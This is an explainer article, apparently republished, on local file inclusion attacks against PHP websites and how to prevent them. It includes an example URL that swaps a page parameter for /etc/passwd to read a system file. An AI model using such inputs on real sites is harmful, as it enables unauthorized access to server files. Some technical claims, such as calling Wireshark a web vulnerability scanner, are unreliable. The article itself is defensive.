What Are Local File Intrusion (LFI) Attacks and Should You Be Worried?
Reading Time: 4 minutesIf your site runs on PHP, you might be at risk of local file intrusion attacks. But how are they carried out and what can you do about them?
Web servers host the files (web pages, pictures, videos, forms, etc.) that make up your web application and serve these files when someone visits your website. Some servers are more advanced and also control how much access web visitors have. They may restrict regular visitors from accessing other users’ accounts or administrative dashboards. Although web servers are efficient at what they do—and they do it rather securely—attackers can exploit errors that arise from human error or flawed logic in how a server serves the files it hosts.
What Is an LFI Attack?
A Local File Intrusion (LFI) attack happens when attackers exploit vulnerabilities in how a web server stores, serves, validates, or controls access to its files. This vulnerability is common to PHP-based websites.
Unlike many forms of cyberattacks where attackers rely on malware to corrupt an application, attackers in LFIs mostly rely on clever tricks and short lines of code. This seldom requires sophisticated tools or complex scripts; attacks typically happen on the web browser. The most common trick attackers use is modifying the URL string with code, file paths, or file names.
How Do LFI Attacks Happen?
LFI attacks typically happen in four stages.
First, the attacker identifies a PHP website running a vulnerable web application, usually by running a basic code in the browser URL to see if the web application (i.e. the site) handles the command. Think of it as pressing key combinations on your game controller to unlock an Easter egg—say, for example, pressing the down-key to enter tunnels in Super Mario. But the commands attackers run in LFI attacks are more consistent than checking every tunnel in Super Mario.
A web application or server that has been improperly configured or fails to validate inputs will execute the malicious code. From here, the hacker may gain the access and privilege they need to read vulnerable files or upload malicious files to the server.
Most LFI attacks result in the attacker accessing sensitive information. The possibility of uploading malware is seldom successful because there is no guarantee that the web application will save the file on the same server where the LFI vulnerability exists. This is often the case if the web application is in a multi-server environment.
So, if the LFI vulnerability exists on the server that hosts images but not the server that stores employee credentials or user passwords, the attacker would only have access to image files on that vulnerable server. Regardless, cyber events like the attack on LastPass show that hackers can wreak havoc with seemingly the most insignificant level of access.
How to Prevent LFI Attacks
LFI attacks are quite common, according to the Open Web Application Security Project (OWASP). Understandably, hackers would favor this attack since, as W3Techs reports, nearly eight in 10 websites run PHP as a server-side programming language—an abundance of victims, so to speak. It is possible to prevent an LFI attack by adopting web security best practices.
Whitelist Public Server Files
Web applications often use file paths as URL inputs. Hackers can exploit this filing system by changing the part of the URL that doubles as a file path. For example, an attacker can change https://dummywebsite.com/?module=contact.php to https://dummywebsite.com/?module=/etc/passwd. A vulnerable server with poor filtering and flawed logic will display the contents of the file stored in the path /etc/passwd.
Of course, hackers use variations of common file names and combinations of query characters to increase the odds of a successful attack. The goal is to trick the web application into running a script or displaying the files on a web server.
You can block this vulnerability by creating a whitelist of public documents on your server and instructing the web application to disregard queries for every other document or file path. So, if an attacker tries to manipulate the URL to request or run codes requesting a private, they’ll get an error page instead.
Test for Vulnerabilities Frequently
You can use web scanning tools to find and fix vulnerabilities that could expose you to LFI attacks. Web app scanners are automated tools that crawl your app like an attacker and alert you to potential vulnerabilities. There are several open-source web scanners like OpenVAS and Wireshark, but most vulnerability scanners are proprietary software and require paid plans to use.
But, of course, you’re not getting a web scanner for just LFI attacks. These tools also look for broader security vulnerabilities like remote file inclusion, cross-site scripting, SQL injection, and poor server configurations. So, they are worth it.
Restrict Site Visitor Privileges
Hackers often execute LFI attacks successfully because web applications fail to compartmentalize user privileges, and in doing so allow visitors to access files that should only be visible to admins. This measure works like whitelisting: configure your web application and server so that they serve public files and disregard unauthorized requests when a visitor interacts with the web app. This is especially important for queries to file paths containing sensitive files.
To this end, you may need to prevent file paths from being modified directly. The web app should only serve documents from a hardcoded path list. Furthermore, configure the web app to process requests with dynamic path concatenation (the URLs should contain alphanumeric characters) instead of base64 or bin2hex functions.
If you’re thinking about blacklisting file names, don’t. Hackers usually have a growing list of file names they can use to execute an LFI attack. Besides, it is practically impossible (and a colossal waste of time) to blacklist a list of constantly increasing sources of attack.
Use a Multi-Server Environment
A multi-server environment lets you isolate important, sensitive documents from public files, thus reducing your risk in case of a breach. Dedicated servers are less vulnerable to LFI attacks because, although they work together, their configurations differ.
Besides this security, multiple servers are also reliable (with lower risks of downtime), fast, and efficient. Admittedly, using a multi-server environment is not cost-effective if your website is small. In that case, consider splitting your web application’s access to data between a database for private data and a server for public files.
Should You Be Worried About LFI Attacks?
The possibility of an LFI attack is there, especially if your site runs on PHP, but you can reduce your exposure by configuring web applications and servers according to web security best practices.
Furthermore, you should consider doing routine security checks to find vulnerabilities. Things break all the time, especially as site architecture becomes complex. The tools you’ll need to protect yourself are automated, and many do not require an elaborate setup or advanced technical know-how.
Reference: https://www.makeuseof.com/what-are-local-file-intrusion-attacks/
Ref: makeuseof
MediaDownloader.net -> Free Online Video Downloader, Download Any Video From YouTube, VK, Vimeo, Twitter, Twitch, Tumblr, Tiktok, Telegram, TED, Streamable, Soundcloud, Snapchat, Share, Rumble, Reddit, PuhuTV, Pinterest, Periscope, Ok.ru, MxTakatak, Mixcloud, Mashable, LinkedIn, Likee, Kwai, Izlesene, Instagram, Imgur, IMDB, Ifunny, Gaana, Flickr, Febspot, Facebook, ESPN, Douyin, Dailymotion, Buzzfeed, BluTV, Blogger, Bitchute, Bilibili, Bandcamp, Akıllı, 9GAG